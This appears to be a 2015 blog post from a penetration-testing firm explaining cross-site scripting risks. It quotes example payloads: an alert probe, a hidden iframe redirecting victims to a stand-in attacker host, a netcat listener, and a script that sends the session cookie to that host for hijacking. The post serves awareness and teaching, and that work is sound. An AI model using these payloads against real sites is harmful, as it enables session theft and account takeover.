March 24, 2015

Cross Site scripting or XSS is one of the most common vulnerabilities in Web Applications. We find this sort of vulnerability in variations in 70% of our Penetration Tests. Now why is XSS so dangerous? Well because it allows an ordinary visitor to a web site to execute command through the Web Application which in the worst case scenario can be used to obtain full control over the web server.

Examples

Thing of a guest book or form application. Instead of leaving a text a malicious person could put in:

<script>alert(“VULNERABLE”)</script> 

If vulnerable, a pop up will appear saying VULNERABLE.

If an XSS vulnerability is found a lot of damage can be done like an iFrame can be injected to transfer the victim through the browser to an attackers web server:

<iframe SRC=”http://hackerabc.com/blah” height = “0” width =”0″></iframe>

The attacker would then run a simple netcat listener: nc -nlvp 80

and get quite a bit of info about the victims browser.

But far worse could be done. The session cookie can be stolen. That means if the user is logged into the application, a malicious attacker could then take over this application by replaying the session ID:

<script> new Image().src=”http://hackerabc.com/bad.php?output=”+document.cookie; </script>

Cookie Manager (a Firefox plugin can be used to replay the session ID and take over the session).

Those are very basic examples and there are far more sophisticated attacks (like having the victim web server sending a full reverse shell). In our Pentests we regularly come across those, so we would like to stress the fact that XSS is a serious threat these days.

A good starting point is: http://en.wikipedia.org/wiki/Cross-site_scripting

Share

November 30, 2014

Share